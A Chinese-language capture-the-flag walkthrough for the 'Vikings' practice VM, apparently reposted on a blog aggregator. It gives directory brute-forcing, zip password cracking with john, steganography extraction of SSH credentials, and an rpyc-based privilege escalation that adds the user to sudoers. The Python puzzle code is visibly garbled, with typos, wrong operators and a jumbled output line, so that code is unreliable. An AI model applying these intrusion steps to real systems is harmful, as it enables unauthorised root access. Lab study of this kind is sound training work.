Vikings靶机打靶过程及思路
1.常規端口服務偵探
2.用gubuster進行路徑爆破,發現war下war-is-over新目錄
gobuster dir -r -u http://10.0.2.16/ -x txt,html,php -w /usr/share/seclists/Discovery/Web-Content/common.txt
3.發現base64編碼字符串,在cyberchef里面解碼發現混亂無序
使用entro進行熵增探測發現熵值為7.9超過7.5證明是經過加密或壓縮后的文件
偵探發現是一個zip壓縮文件,下載保存后進行解壓發現需要密碼
4.使用john進行密碼爆破
首先將文件保存成hash值zip2john a.zip >hash
將wordlists里的Rockyou字典解壓保存到桌面
john hash --wordlists=rockyou.txt得到密碼ragnarok123
5.發現解壓后有圖片文件,思考是否有隱寫數,使用工具進行探測隱寫
使用steghide工具進行探測 steghide info king但是發現又需要密碼
使用binwalk進行二進制的分析,binwalk -B king發現存在壓縮文件
查看后得到ssh賬號密碼嘗試登錄成功
6.查看readme文件里提示需要造船
boat文件里面給出提示是考拉茲猜想,進行質數查找,編寫簡單的素數判斷程序
對第29個質數進行考拉茲計算后打印ASCII編碼對應的字符串
n=0
for x in range (1000)
if x<2:
continute
h=int(x/2)+1
for i in range(2,h):
if x%i=0:
break
else:
n+=1
print(n,“:”,x)
進行考拉茲判斷
i=109
c=[i]
while i≠1:
if i%2=1:
i=i%3+1
else:
i=i//2
if i<256:
c.append(i)
print?
mR)|>^/Gky[gz=.F#j5P(
7.將數字進行ASCII編碼還原,將得到的字符串進行ssh登錄,發現進入后進行自動sudo
先bin/bash -i 進行提權,查看運行腳本的文件,里面運用了rpyc遠程管理
import rpyc
def shell():
import os
os.system(“sudo usermod -a -G sudo ragnar”)
conn = rpyc.classic.connect(“localhost”)
fn=conn.teleport(shell)
fn()
8.目標靶機上查看18812端口是否開啟
ss -pantu | grep 18812發現開啟,并且是本機127.0.0.1,所以代碼需要在靶機上運行
運行腳本,升級shell ,/bin/bash
9.sudo -s成功提權到root權限,打靶完成
總結
以上是生活随笔為你收集整理的Vikings靶机打靶过程及思路的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 不知道做什么副业,如何选择副业,副业的重
- 下一篇: 如何成为杰出的程序员?Java虚拟机学习